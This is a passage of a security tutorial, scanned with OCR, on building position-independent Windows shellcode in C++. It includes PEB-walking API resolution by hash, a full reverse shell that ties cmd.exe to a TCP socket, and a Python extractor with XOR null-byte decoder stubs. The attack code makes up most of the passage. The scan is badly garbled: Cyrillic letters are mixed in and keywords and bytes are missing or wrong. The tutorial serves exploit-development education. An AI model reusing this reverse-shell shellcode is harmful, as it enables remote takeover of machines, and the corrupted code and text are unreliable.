013E101E 66 C7 45 FC 6E 67 mov word ptr [ebp-4],676Eh 
013E1024 C6 45 FE 00 mov byte ptr [ebp-2],0 
013E1028 FF 15 90 20 3E 01 call dword ріг 4$:[13Е20901] 





As you can see, part of the string is located in the .rdata section а ће address 13E2100h, while other parts 
of the string аге encoded іп the source operands of the mov instructions like before. 


The solution | came up with is to allow code like 
С++ 





char *str = "I'm a very long string"; 


and fix the shellcode with a Python script. That script needs to extract the referenced strings from the .rdata 
section, put them into the shellcode and fix the relocations. We'll see how soon. 


Don’t call Windows API directly 
We can't write 


C++ 





WaitForSingleObject(proclnfo.hProcess, INFINITE); 


in our C/C++ code because “WaitForSingleObject” needs to be imported from kernel32.dll. 


The process of importing a function from a library is rather complex. In a nutshell, the PE file contains an 
import table and an import address table (IAT). The import table contains information about which functions 
to import from which libraries. The IAT is compiled by the Windows loader when the executable is loaded 
and contains the addresses of the imported functions. The code of the executable call the imported functions 
with a level of indirection. For example: 


001D100B FF 15 94 20 1р 00 call dword ptr ds:[1D2094h] 


The address 1D2094h is the location of the entry (in the IAT) which contains the address of the function 
MessageBoxA. This level of indirection is useful because the call above doesn't need to be fixed (unless the 
executable is relocated). The only thing the Windows loader needs to fix is the dword at 1D2094h, which is 
the address of the MessageBoxA function. 


The solution is to get the addresses of the Windows functions directly from the in-memory data structures of 
Windows. We'll see how this is done later. 
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Install VS 2013 СТР 
First of all, download the from and install it. 


Create a New Project 


Go to — — , select — — — — | 
choose а name for the project (| chose ) and hit OK. 
Go to m and a new dialog will appear. Apply the changes to all 
configurations ( and ) by setting (top left of the dialog) to 
Тћеп, ехрапа and under modify so that it says 
. This way you'll be able to use some features of and 
like 


Example of Shellcode 


Here’s the code for a simple ( ). Add a file named to the project and 
copy this code in it. Don't try to understand all the code right now. We'll discuss it at length. 


С++ 


#include <WinSock2.h> 
#include <WS2tcpip.h> 
#include <windows.h> 
#include <winnt.h> 
#include <winternl.h> 
#include <stddef.h> 
#include <stdio.h> 


#define htons(A) ((((WORD)(A) & Oxff00) >> 8) | (((WORD)(A) & OxOOff) << 8)) 


_inline PEB *getPEB() { 
DEBE: 
__asm { 
mov eax, fs:[30h] 
том р, eax 
} 
turn р, 
} 


DWORD getHash(const char *str) { 
DWORD h = 0; 
(*str) { 
h = (h >> 13) | (h << (32 - 13)); 
h += *str >= 'а' ? *str - 32 : "str; 
str++; 


} 


nh; 
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DWORD getFunctionHash(const char *moduleName, const char *functionName) { 
return getHash(moduleName) + getHash(functionName); 


} 


LDR DATA TABLE ENTRY *getDataTableEntry(const LIST ENTRY *ptr) { 
int list entry offset = offsetof(LDR DATA TABLE ENTRY, InMemoryOrderLinks); 
return (LDR DATA TABLE ENTRY *)((BYTE *)ptr - list entry offset); 


) 











PVOID getProcAddrByHash(DWORD hash) { 
РЕВ “рер = getPEB(); 
LIST ENTRY “first  peb-2Ldr-»InMemoryOrderModuleList.Flink; 
LIST ENTRY *ptr = first; 
do { 
LDR DATA TABLE ENTRY *dte = getDataTableEntry(ptr); 
ptr = ptr->Flink; 





BYTE *baseAddress = (BYTE “)а(е->р Вазе; 
if (IbaseAddress) 

continue; 
IMAGE DOS HEADER *dosHeader = (IMAGE DOS HEADER *)baseAddress; 
IMAGE NT HEADERS *ntHeaders = (IMAGE NT HEADERS *)(baseAddress + dosHeader-»e Ifanew); 
DWORD iedRVA = ntHeaders-»OptionalHeader.DataDirectoryIMAGE DIRECTORY ENTRY EXPORT].VirtualAddress; 
if ('iedRVA) 

continue; 
IMAGE EXPORT DIRECTORY “есі = (IMAGE EXPORT DIRECTORY *)(baseAddress + iedRVA); 
char *moduleName = (char *)(baseAddress + ied-» Name); 
DWORD moduleHash = getHash(moduleName); 


DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames); 
for (DWORD i = 0; i < ied->NumberOfNames; ++i) | 
char *functionName = (char *)(baseAddress + nameRVAs[i]); 
if (hash == moduleHash + getHash(functionName)) { 
WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i]; 
DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal]; 
return baseAddress + functionRVA; 


} 


} 
} while (ptr != first); 


return NULL; 
} 


#define HASH_LoadLibraryA Oxf8b7108d 
0x2ddcd540 
0x0b9d13bc 
Ox9fd4f1 6f 
Ё 0xa50da182 
#define HASH  CreateProcessA 0х231сре70 
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#define HASH inet тоа Ox1b73fed1 
define HASH inet адаг 0x01 1bfae2 
0хас2953с9 
0x5c1c856e 
| 0x4b3153e0 
#define HASH WaitForSingleObject Oxca8e9498 


#define DefineFuncPtr(name) — decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name) 


int entryPoint() { 


DefineFuncPtr(LoadLibraryA); 
My LoadLibraryA("ws2 32.dll"); 


DefineFuncPtr(WSAStartup); 
DefineFuncPtr(WSASocketA); 
DefineFuncPtr(WSAConnect); 
DefineFuncPtr(CreateProcessA); 
DefineFuncPtr(inet ntoa); 
DefineFuncPtr(inet addr); 
DefineFuncPtr(getaddrinfo); 
DefineFuncPtr(getnameinfo); 
DefineFuncPtr(ExitThread); 
DefineFuncPtr(WaitForSingleObject); 


const char *hostName = "127.0.0.1"; 
const int hostPort = 123; 


WSADATA wsaData; 


(My WSAStartup(MAKEWORD(2, 2), &wsaData)) 
Жо end; 
SOCKET sock = My WSASocketA(AF INET, SOCK STREAM, IPPROTO TCP, LI, ©), 0): 
(sock == INVALID_SOCKET) 
to end; 


addrinfo *result; 
f (My getaddrinfo(hostName, NULL -L, &result)) 
to end; 
char ip addr[16]; 
Му getnameinfo(result-»ai addr, result-»ai addrlen, ip addr, sizeof(ip адаг), NULL, 0, МІ NUMERICHOST); 


SOCKADDR ІМ remoteAddr; 

remoteAddr.sin family = AF INET; 
remoteAddr.sin port = htons(hostPort); 
remoteAddr.sin addr.s addr = My inet addr(ip addr); 


(My WSAConnect(sock, (SOCKADDR *)&remoteAddr, (remoteAddr), 
to end; 





STARTUPINFOA віпіо; 

PROCESS INFORMATION ргосіпіо; 

SecureZeroMemory(&slnfo, (sInfo)); 

sInfo.cb = (sInfo); 

sInfo.dwFlags = 5ТАКТЕ USESTDHANDLES; 

sInfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sock; 

My. CreateProcessA( LL, "cmd.exe", LNW, TRUE, ©), б LL, &sInfo, &procinfo); 


My_WaitForSingleObject(procinfo.hProcess, INFINITE); 


__ end: 
My. ExitThread(0); 
0; 
) 


int main() ( 
rn entryPoint(); 





Compiler Configuration 


Go to m , ехрапа and then . Аррју ће 
changes to the Release Configuration. 


Here are the settings you need to change: 


А | : № (/sdl-) 
Maybe this is not needed, but | disabled them anyway. 


о : Minimize Size (/O1) 
This is very important! We want a shellcode as small as possible. 
о : Only inline (/Ob1) 
If a function A calls a function B and B is inlined, then the call to B is replaced with the code of B itself. 
With this setting we tell VS 2013 to inline only functions decorated with 
This is critical! just calls the function of our зће соде. If the function is 
short, it might be inlined into . This would be disastrous because wouldn't indicate the 
end of our shellcode anymore (in fact, it would contain part of it). We'll see why this is important later. 
о : Yes (/Oi) 
| don't know if this should be disabled. 
: Favor small code (/Os) 


: Yes (/GL) 
3 heck: Disable Security Check (/GS-) 
We don't need any security checks! 
о : Yes (/Gy) 
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Linker Configuration 


Go to Project «project name> properties, expand Configuration Properties and then Linker. Apply the 
changes to the Release Configuration. Here are the settings you need to change: 


• General: 
о Enable Incremental Linking: No (/INCREMENTAL:NO) 
• Debugging: 
о Generate Map File: Yes (/МАР) 
Tells the linker to generate a map Пе containing the structure of the EXE. 
о Map File Мате: mapfile 
This is the name of the map file. Choose whatever name you like. 
• Optimization: 
о References: Yes (/OPT:REF) 
This is very important to generate a small shellcode because eliminates functions and data that are 
never referenced by the code. 
о Enable COMDAT Folding: Yes (/OPT:ICF) 
о Function Order: function order.tkt 
This reads a file called function order.txt which specifies the order in which the functions must appear 
in the code section. We want the function entryPoint to be the first function in the code section so my 
function order.txt contains just a single line with the word ?entryPoint@@YAHXZ. You can find the 
names of the functions in the map file. 


де РгосАдагВуНазћ 

This function returns the address of a function exported by a module (.exe ог .dll) present in memory, given 
the hash associated with the module and the function. It's certainly possible to find functions by name, but 
that would waste considerable space because those names should be included in the shellcode. On the 
other hand, a hash is only 4 bytes. Since we don't use two hashes (one for the module and the other for the 
function), getProcAddrByHash needs to consider а the modules loaded in memory. 


The hash for MessageBoxA, exported by user32.dll, can be computed as follows: 
С++ 





DWORD hash = getFunctionHash("user32.adll", "M 


where hash is the sum of getHash(“user32.dll”) and getHash(“MessageBoxA”). The implementation of 
getHash is very simple: 


С++ 
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As you can see, the hash is case-insensitive. This is important because in some versions of Windows the 
names in memory are all uppercase. 


First, getProcAddrByHash gets the address of the TEB (Thread Environment Block): 
С++ 


РЕВ *peb = getPEB(); 





where 
С++ 


inline PEB *getPEB() { 
РЕВ О: 
. asm( 
mov eax, fs:[30h] 
mov р, eax 





The selector fs is associated with a segment which starts at the address of the TEB. At offset 30h, the TEB 
contains a pointer to the PEB (Process Environment Block). We can see this in WinDbg: 

0:000> dt TEB @$teb 

ntdi!! TEB 

+0x000 NtTib : NT TIB 

*0x01c EnvironmentPointer : (null) 

+0x020 Clientld : CLIENT ID 

*0x028 ActiveRpcHandle : (null) 


+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void 
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB 
*0x034 LastErrorValue :0 

+0x038 CountOfOwnedCriticalSections : 0 

*0x03c CsrClientThread : (null) 


<snip> 





The PEB, as the name implies, is associated with the current process and contains, among other things, 
information about the modules loaded into the process address space. 
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Here’s getProcAddrByHash again: 
С++ 


PVOID getProcAddrByHash(DWORD hash) { 
PEB *peb = getPEB(); 
LIST ENTRY *first = peb-2Ldr-»InMemoryOrderModuleList.Flink; 
LIST ENTRY *ptr = first; 


J 
LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr); 
ptr = ptr->Flink; 





Here’s part of the PEB: 


0:000> dt PEB @$peb 
ntdll!__PEB 
+0x000 InheritedAddressSpace : 0 " 
+0x001 Кеаатаде  еЕхесОрн оп5 : 0" 
+0x002 BeingDebugged : 0x1" 
+0x003 BitField :0х8" 
+0x003 ImageUsesLargePages : 0у0 
+0x003 IsProtectedProcess : OyO 
+0х003 151 едасуРгосеѕѕ : 0у0 
+0х003 IslmageDynamicallyRelocated : 0у1 
+0х003 SkipPatchingUser32Forwarders : 0у0 
*0x003 SpareBits : 0y000 
+0x004 Mutant MIO Void 
+0x008 ImageBaseAddress : 0x00060000 Void 
*0x00c Ldr : Ox76fd0200 PEB LDR DATA 
*0x010 ProcessParameters : 0х00681718 RTL USER PROCESS PARAMETERS 
+0х014 SubSystemData  : (null) 
+0х018 РгосеззНеар : 0х00680000 Мола 


<snip> 
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At offset OCh, there is a field called Ldr which points to а РЕВ LDR DATA data structure. Let's see that in 
WinDbg: 


0:000» dt РЕВ LDR DATA 0х76#40200 
ntdi!! РЕВ LDR DATA 
+0х000 Length :0х30 
*0x004 Initialized : 0x1 " 
*0x008 SsHandle : (null) 
+0х00с InLoadOrderModuleList : LIST ЕМТКҮ [ 0х683080 - 0х6862с0 | 


+0х014 InMemoryOrderModuleList: LIST ENTRY [ 0х683088 - 0x6862c8 | 
+0х01с InlInitializationOrderModuleList: LIST ENTRY [ 0х683120 - 0x6862d0 | 
+0x024 EntryInProgress : (null) 

+0x028 ShutdownlnProgress : 0" 

+0x02c ShutdownThreadid : (null) 





InMemoryOrderModuleList is a doubly-linked list of LDR DATA TABLE ENTRY structures associated with 
the modules loaded in the current process’s address space. To be precise, |n\MemoryOrderModuleList is a 
LIST ENTRY, which contains two fields: 


0:000> dt_LIST_ENTRY 
ntdll! LIST ENTRY 


+0х000 Flink : Ptr32. LIST ENTRY 
+0x004 Blink : Ptr32 LIST ENTRY 





Flink means forward link and Blink backward link. Flink points to the LDR DATA TABLE ENTRY of the first 
module. Well, not exactly: Flink points to a LIST ENTRY structure contained in the structure 
LDR_DATA_TABLE_ENTRY. 


Let's see how LDR DATA TABLE ENTRY is defined: 


0:000» dt LDR DATA TABLE ENTRY 

ntdil! LDR DATA TABLE ENTRY 
+0х000 InLoadOrderLinks : LIST ENTRY 
+0x008 InMemoryOrderLinks : LIST ENTRY 


*0x010 InlnitializationOrderLinks : LIST ENTRY 
*0x018 DilBase : Ptr32 Void 

%0х01с EntryPoint : Ptr32 Void 

%0х020 SizeOflmage : Uint4B 
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+0x024 FullDIIName : UNICODE STRING 
*0x02c Вазери Мате : UNICODE STRING 
+0x034 Flags : Uint4B 

+0x038 LoadCount : Uint2B 

+0x03a Тіѕіпаех : Uint2B 

+0x03c HashLinks : LIST ЕМТКҮ 

+0x03c SectionPointer : Ptr32 Void 

+0x040 CheckSum : Uint4B 

*0x044 TimeDateStamp  : Uint4B 

+0х044 Loadedlmports : Ptr32 Void 

+0х048 EntryPointActivationContext : Ptr32 ACTIVATION CONTEKT 
+0x04c PatchInformation : Ptr32 Void 

*0x050 ForwarderLinks : LIST ENTRY 
+0x058 ServiceTagLinks : LIST ENTRY 
+0x060 StaticLinks : LIST ENTRY 

*0x068 ContextInformation : Ptr32 Void 

+0x06c OriginalBase : Uint4B 

*0x070 LoadTime : LARGE INTEGER 





InMemoryOrderModuleList.Flink points to ОК DATA TABLE ENTRY.InMemoryOrderLinks which is at 
offset 8, so we must subtract 8 to get the address of LDR DATA TABLE ENTRY. 


First, let'S get the Flink pointer: 


*0x00c InLoadOrderModuleList: LIST ENTRY [ 0x683080 - 0x6862c0 | 


Its value is 0x683080, so the | DR DATA TABLE ENTRY structure is at address 0x683080 – 8 = 
0х683078: 
0:000» dt LDR DATA TABLE ENTRY 683078 
ntdi!! LDR DATA TABLE ENTRY 
+0х000 InLoadOrderLinks : LIST ЕМТКҮ [ 0х359469е5 - 0х1800еебї | 
+0х008 InMemoryOrderLinks : LIST ENTRY | 0683110 - 0x76fd020c | 


*0x010 InlnitializationOrderLinks : LIST ENTRY [ 0х683118 - 0x76fd0214 | 
*0x018 011Ваѕе : (null) 
%0х01с EntryPoint : (null) 
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+0х020 5хеОНтаде  :0:60000 

*0x024 FullDlIName | : UNICODE STRING "#m¥0ġ0 ш; n???" 
+0x02c Вазер Мате : UNICODE STRING "C:\Windows\SysWOW64\calc.exe" 
+0x034 Flags : 0x120010 

*0x038 LoadCount : 0х2034 

*0x03a TlsIndex : 0x68 

*0x03c HashLinks : LIST. ENTRY [ 0x4000 - Oxffff | 

%0х03с SectionPointer : 0x00004000 Void 

*0x040 CheckSum : Oxffff 

%0х044 TimeDateStamp : 0x6841b4 

%0х044 Loadedimports :0х00684164 Void 

*0x048 EntryPointActivationContext : 0х76#4908 АСТІМАТІОМ СОМТЕХТ 
+0x04c PatchInformation : 0х4се7979а Void 

+0x050 ForwarderLinks : LIST ENTRY [ 0x0 - 0x0 ] 

+0x058 ServiceTagLinks : LIST ENTRY [ 0x6830d0 - 0x6830d0 ] 

*0x060 StaticLinks — : LIST ENTRY [ 0x6830d8 - 0x6830d8 | 

*0x068 Contextlnformation : 0x00686418 Void 

*0x06c OriginalBase : 0x6851a8 

+0х070 LoadTime : LARGE INTEGER 0x76f0c9d0 

















As you can see, I’m debugging calc.exe in WinDbg! That's right: the first module is the executable itself. The 
important field is ОШ Base (c). Given the base address of the module, we can analyze the PE file loaded in 
memory and get all kinds of information, like the addresses of the exported functions. 


That's exactly what we do in getProcAddrByHash: 
С++ 


BYTE *baseAddress = (BYTE “) е->р Вазе; 
(!baseAddress) 
continue; 
IMAGE DOS HEADER *dosHeader = (IMAGE DOS HEADER *)baseAddress; 
IMAGE NT HEADERS *ntHeaders = (IMAGE NT HEADERS *)(baseAddress + dosHeader-»e lfanew); 
DWORD iedRVA = ntHeaders-»OptionalHeader.DataDirectory[IMAGE DIRECTORY ENTRY EXPORT].VirtualAddress; 
(liedRVA) 


tinue: 
5 , 


IMAGE, EXPORT. DIRECTORY “есі = IMAGE EXPORT. DIRECTORY *)(baseAddress + iedRVA); 
char *moduleName = (char *)(baseAddress + ied->Name); 
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DWORD moduleHash = getHash(moduleName); 


DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames); 
r (DWORD i = 0; i < ied->NumberOfNames; ++i) { 
char *functionName = (char *)(baseAddress + nameRVAS[i]); 


(hash == moduleHash + getHash(functionName)) { 

WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i]; 

DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal]; 
baseAddress + functionRVA; 





To understand this piece of code you'll need to have a look at the PE file format specification. | won’t go into 
too many details. One important thing you should know is that many (if not all) the addresses in the PE file 
structures are (Relative Virtual Addresses), i.e. addresses relative to the base address of the PE 
module (011Ваѕе). For example, if the RVA is 100h and DllBase is 400000h, then the RVA points to data at 
the address 400000ћ + 100ћ = 400100ћ. 


The module starts with the so called which contains a RVA ( ) to the 
which are the and the . The contains an array 
called which points to various “directories” of the PE module. We are interested in the 


The C structure associated with the Export Directory is defined as follows: 
C++ 


struct IMAGE EXPORT DIRECTORY ( 
DWORD Characteristics; 
DWORD TimeDateStamp; 
WORD  MajorVersion; 
WORD  MinorVersion; 
DWORD Мате; 


DWORD Base; 
DWORD NumberOfFunctions; 
DWORD NumberOfNames; 
DWORD AddressOfFunctions; 
DWORD AddressOfNames; 
DWORD AddressOfNameOrdinals; 
IMAGE EXPORT DIRECTORY, *PIMAGE EXPORT DIRECTORY; 





The field is a RVA to a string containing the name of the module. Then there are 5 important fields: 


number of elements in AddressOfFunctions. 
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. NumberOfNames: 
number of elements in AddressOfNames. 
• AddressOfFunctions: 


RVA to an array of RVAs (DWORDS) to the entrypoints of the exported functions. 
• AddressOfNames: 

RVA to an array of RVAs (DWORDs) to the names of the exported functions. 
• AddressOfNameOrdinals: 

RVA to an array of ordinals (WORDS) associated with the exported functions. 


As the comments in the C/C++ code say, the arrays pointed to by AddressOfNames and 


AddressOfNameOrdinals run in parallel: 


AddressOfNames AddressOfNameoOrdinals AddressOfFunctions 
name of func?  — = ordinal of func1 ^ address of func3 


name of func?  —— — — —» ordinal of func2 "c address of func1 


name of func3 > ordinal_of func3 —~ address of func2 





While the first two arrays run in parallel, the third doesn't and the ordinals taken from 
AddressOfNameOrdinals are indices in the array AddressOfFunctions. 


So the idea is to first find the right name in AddressOfNames, then get the corresponding ordinal in 
AddressOfNameOrdinals (at the same position) and finally use the ordinal as index in AddressOfFunctions 
to get the RVA of the corresponding exported function. 


DefineFuncPtr 
DefineFuncPtr is a handy macro which helps define a pointer to an imported function. Here’s an example: 


C++ 
#define HASH WSAStartup Ox2ddcd540 


#define DefineFuncPtr(name) decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name) 





DefineFuncPtr(W SAStartup); 


WSAStartup is a function imported from ws2 32.dll, so HASH WSAStartup is computed this way: 
С++ 





DWORD hash = getFunctionHash("ws2 32.dll", "WSAStartup"); 
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When the macro is expanded, 
С++ 





DefineFuncPtr(W SAStartup); 


becomes 
С++ 


decltype(WSAsStartup) "Му WSAStartup = (decltype(WSAsStartup) *)getProcAddrByHash(HASH_WSAStartup) 





where decltype(WSAStartup) is the type of the function WSAStartup. This way we don't need to redefine the 
function prototype. Note that десйуре was introduced in C++11. 


Now we can call WSAStartup through My WSAStartup and intellisense will work perfectly. 


Note that before importing a function from a module, we need to make sure that that module is already 
loaded in memory. While kernel32.dll and ntdll.dl! are always present (lucky for us), we can't assume that 
other modules are. The easiest way to load a module is to use LoadLibrary: 


C++ 


DefineFuncPtr(LoadLibraryA); 





My. LoadLibraryA("ws2. 32.011"); 


This works because LoadLibrary is imported from kernel32.dll that, as we said, is always present in memory. 


We could also import GetProcAddress and use it to де ће address of all the other function we need, but 
that would be wasteful because we would need to include the full names of the functions in the shellcode. 


entryPoint 


entryPoint is obviously the entry point of our shellcode and implements the reverse shell. First, we import all 
the functions we need and then we use them. The details are not important and | must say that the winsock 
API are very cumbersome to use. 


In a nutshell: 


we create a socket, 

connect the socket to 127.0.0.1:123, 

create a process by executing cmd.exe, 

attach the socket to the standard input, output and error of the process, 
wait for the process to terminate, 

when the process has ended, we terminate the current thread. 


mou АЕ 


Point 3 and 4 are performed at the same time with a call to CreateProcess. Thanks to 4), the attacker can 
listen on port 123 for a connection and then, once connected, can interact with cmd.exe running on the 
remote machine through the socket, i.e. the TCP connection. 
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To try this out, install ncat (download), run cmd.exe and at the prompt enter 


пса! -lvp 123 


This will start listening on port 123. 
Then, back in Visual Studio 2013, select Release, build the project and run it. 


Со back to ncat and you should see something like the following: 


Microsoft Windows [Version 6.1.7601] 
Copyright (с) 2009 Microsoft Corporation. All rights reserved. 


C:\Users\Kiuhnm>ncat -lvp 123 

Neat: Version 6.47 ( http://nmap.org/ncat ) 
Neat: Listening on :::123 

Neat: Listening on 0.0.0.0:123 

Мсаї: Connection from 127.0.0.1. 

Neat: Connection from 127.0.0.1:4409. 
Microsoft Windows [Version 6.1.7601] 


Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:\Users\Kiuhnm\documents\visual studio 201 3\Projects\shellcode\shellcode> 





Now you can type whatever command you want. To exit, type exit. 
main 

Thanks to the linker option 

Function Order: function order.tkt 


where the first and only line of function order.txt is ?entryPoint@@YAHXzZ, the function entryPoint will be 
positioned first in our shellcode. This is what we want. 


It seems that the linker honors the order of the functions in the source code, so we could have put entryPoint 
before any other function, but | didn't want to mess things up. The main function comes last in the source 
code so it's linked at the end of our shellcode. This allows us to tell where the shellcode ends. We'll see how 
in a moment when we talk about the map file. 
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Python script 


Introduction 
Now that the executable containing our shellcode is ready, we need a way to extract and fix the shellcode. 
This won't be easy. | wrote a Python script that 


T. extracts the shellcode 

2. handles the relocations for the strings 

З. fixes the shellcode by removing null bytes 

By the way, you can use whatever you like, but | like and use ( ). 


The script weighs only 392 LOC, but it’s a little tricky so ГП explain it in detail. 
Here’s the code: 
Python 


datetime 
pefile 


author = 'Massimiliano Tomassoli' 
year = datetime.date.today().year 


(value): 
irn [value & Oxff, (value >> 8) & Oxff, (value >> 16) & Oxff, (value >> 24) & Oxff] 


(bytes): 
(bytes[0] & Oxff) | ((bytes[1] & Oxff) << 8) | 
((bytes[2] & Oxff) «« 16) | ((bytes[3] & Oxff) «« 24) 


(data, offset): 


Extracts a C string (i.e. null-terminated string) from data starting from offset. 
pos = data.find(^O', offset) 
pos == -1: 


data[offset:pos+1] 


(map_file): 


Gets the length of the shellcode by analyzing map file (map produced by VS 2013) 
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( CANI Je ca RS 
( (Х) ТОГ In 
МЕ х 7 id oo 


dword to string(d |): 


add loader to shellcode( 


ES 


Bep 
OxE8, 0x00, 0x00, 0x00, 0x00, 
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Ox5E, 

Ox8B, OxFE, 

0x81, 0хС6, x[0], x[1], x[2], x[3], 
OxB9, у[0], у[1], УГ21, УГЗ), 
ОХЕ 


OxAD, 


0x01, Ox3C, 0x07, 
OxE2, OxFA 
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) 
(1, 256) if b not in 


zii 
OxE8, OxFF, OxFF, OxFF, OxFF, 


0хСО, 

0x5F, 

0xB9, xor1[0], 1[1], 1[2], 
0x81, OxF 1, xor2[0], 211), 
0x83, OxC7, 29, 

0x33, OxF6, 

ОхЕС, 


Ox8A, 0x07, 

Ox3C, | ng_byte, 
OxOF, 0x44, OxC6, 
OxAA, 

OxE2, OxF6 


get fixed shellcode( 
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OxE8, OxFF, OxFF, OxFF, OxFF, 


OxCO, 

Oxo # POP 
OxB9, xor1[0], хог1 [1], xor1[2], xor1[3], 

0x81, OxF1, хог2[0], xor2[1], xor2[2], xor2[3], 
Ox8D, Ox5F, -(len( ) + 5) & OxFF, 
0x83, OxC7, 0x30, \DD 
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OxBO, OxFE, 

OxF6, 0x63, 0x01, 
OxOF, OxB7, OxDO, 
0x33, OxF6, 
OxFC, 


ОХВА, 0x07, 
ОХЗА, 0x03, 
OxOF, 0х44, OxC6, 
OxAA, 
0x49, 

0х74, 0х07, 
Ox4A, 
0x75, ОхЕ2, 
0x43, 

0x43, 
OxEB, OxE3 
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if len(relocs) != 0: 
nt(‘Found %d 
nt('Strings:') 
s in addr_to_strings.values(): 


("+ $[--1]) 


reference(s) to %d string(s) in .rdata' Yo (len(relocs), Іеп(аааг to strings))) 


shellcode - add loader to shellcode(shellcode, relocs, addr to strings) 


гіп (Мо relocations found’) 


shellcode.find(^0') == 


(Unbelievable: t the shellcode does not need to be fixed") 
fixed shellcode = shellcode 


(‘Fixing the shellcode...') 


fixed shellcode = get- fixed_shellcode_single_block(shellcode) 
if fixed_shellcode i : 


fixed shellcode = get | fixed | shellcode(shellcode) 
f fixed shellcode i : 


І(ІП Cannot fix the s shellcode") 


nt(‘final shellcode length: %d\n' Yo len(fixed shellcode)) 
nt(‘char shellcode[] = ') 
dump_shellcode(fixed_shellcode) 





main() 


Мар file and shelicode length 
We told the linker to produce a map file with the following options: 


: | : Yes (IMAP) 
Tells the linker to generate a map file containing the structure of the EXE) 
о : mapfile 


The map file is important to determine the shellcode length. 
Here’s the relevant part of the map file: 


shellcode 


Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015) 


Preferred load address is 00400000 
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Start 
0001:00000000 00000a9cH 
0002:00000000 00000094H 
0002:00000094 00000004H 
0002:00000098 00000004H 
0002:0000009c 00000004H 
0002:000000a0 00000004H 
0002:000000a4 00000004H 
0002:000000а8 00000004H 
0002:000000ac 00000004H 
0002:000000b0 00000004H 
0002:000000c0 000000a8H 
0002:00000168 00000084H 
0002:00000110 00000004H 
0002:000001f4 00000004H 
0002:000001f8 00000004H 
0002:000001fc 00000004H 
0002:00000200 00000004H 
0002:00000208 0000005cH 
0002:00000264 00000000H 
0002:00000264 00000028H 
0002:0000028c 00000014H 
0002:000002а0 00000094Н 
0002:00000334 0000027eH 
0003:00000000 00000020H 
0003:00000020 00000364H 
0004:00000000 00000058H 
0004:00000060 00000180H 


Length Name 


Address 


0000:00000000 


5712 


Publics by Value 


— guard fids table 


Class 
Лехіфтп 
idata$5 
.CRT$XCA 
.CRT$XCAA 
.CRT$XCZ 
.CRT$XIA 
.CRT$XIAA 
.CRT$XIC 
.CRT$XIY 
.CRT$XIZ 
data 


.rdata$debug 


.rdata$srdata 
.rtc$IAA 
.rtc$IZZ 
.rtc$TAA 


.rtc$TZZ 
.xdata$x 
.edata 
idata$2 
idata$3 
idata$4 
idata$6 
„даа 
.bss 
.rsrc$01 
.rsrc$02 


Кма+Вазе Lib:Object 


00000000 <absolute> 
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0000:00000000 — guard fids count 00000000 <absolute> 
0000:00000000 . guard flags 00000000 «absolute? 

0000:00000001 ___safe_se_handler_count 00000001 <absolute> 
0000:00000000 __ ImageBase 00400000  «linker-defined» 
0001:00000000 = ?entryPoint@@YAHXZ 00401000 f shellcode.obj 
0001:000001a1 ?getHash@@YAKPBD@Z 004011а1 f shellcode.obj 
0001:000001be  ?getProcAddrByHash@@YAPAXK@Z 004011be f shellcode.obj 


0001:00000266 _таіп 00401266 f shellcode.obj 
0001:00000444 mainCRTStartup 004014d4 f MSVCRT:crtexe.obj 


0001:000004de ?  CxxUnhandledExceptionFiltereng YGJPAU EXCEPTION РОІМТЕК5@@0@7 004014de f MSVC 
RT:unhandld.obj 


0001:00000517 ____ СххЅепһапаіеаЕхсеріопЕіќег 004015111 М5МСКТ:ипћапа!а.обј 
0001:0000052е _ XcptFilter 0040152e f MSVCRT:MSVCR120.dll 


<snip> 





The start of the map file tells us that section 1 is the .text section, which contains the code: 


Start Length Name Class 
0001:00000000 00000a9cH .text$mn 





The second part tells us that the .text section starts with ?entryPoint@@YAHXZ, our entryPoint function, 
and that main (here called main) is the last of our functions. Since main is at offset 0x266 and entryPoint is 
at 0, our shellcode starts at the beginning of the .text section and is 0x266 bytes long. 


Here's how we do it in Python: 
Python 


Gets the length of the shellcode by analyzing map file (map produced by VS 2013) 


n(' main is not the last function of %5' 96 lib object) 
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extracting the shellcode 
This part is very easy. We know the shellcode length and that the shellcode is located at the beginning of 
the section. Here's the code: 


Python 


get shellcode and relocs( 


| use the module (download) which is quite intuitive to use. The relevant part is the body of the 
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strings and .rdata 
As we said before, our C/C++ code may contain strings. For instance, our shellcode contains the following 
line: 


Python 





NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &slnfo, &pr 


The string cmd.exe is located in the .rdata section, a read-only section containing initialized data. The code 
refers to that string using an absolute address: 

00241152 50 ризћ eax 

00241153 8D 44 24 5C lea eax,[espt+5Ch] 

00241157 C7 84 24 88 00 00 00 00 01 00 00 mov dword ptr [esp+88h], 100h 
00241162 50 push eax 

00241163 52 push 

00241164 52 push 

00241165 52 push 

00241166 6A 01 push 

00241168 52 push 

00241169 52 push 

0024116A 68 18 21 24 00 push 242118h 

0024116F 52 push edx 

00241170 89 B4 24 CO 00 00 00 mov dword ptr [esp+0C0h],esi 

00241177 89 B4 24 BC 00 00 00 mov dword ptr [esp+0BCh],esi 

0024117E 89 B4 24 B8 00 00 00 mov dword ptr [esp+0B8h],esi 

00241185 FF 54 24 34 call ^ dword ptr [esp+34h] 





As we can see, the absolute address for cmd.exe is 242118h. Note that the address is part of a push 
instruction and is located at 24116Bh. If we examine the file cmd.exe with a file editor, we see the following: 


56A: 68 18 21 40 00 ризћ 000402118h 


where 56Ah is the offset in the file. The corresponding virtual address (i.e. in memory) is 40116A because 
the image base is 400000h. This is the preferred address at which the executable should be loaded in 
memory. The absolute address in the instruction, 402118h, is correct if the executable is loaded at the 
preferred base address. However, if the executable is loaded at a different base address, the instruction 
needs to be fixed. How can the Windows loader know what locations of the executable contains addresses 
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which need to be fixed? The PE file contains a , which in our case points to the 
section. This contains all the RVAs of the locations that need to be fixed. 


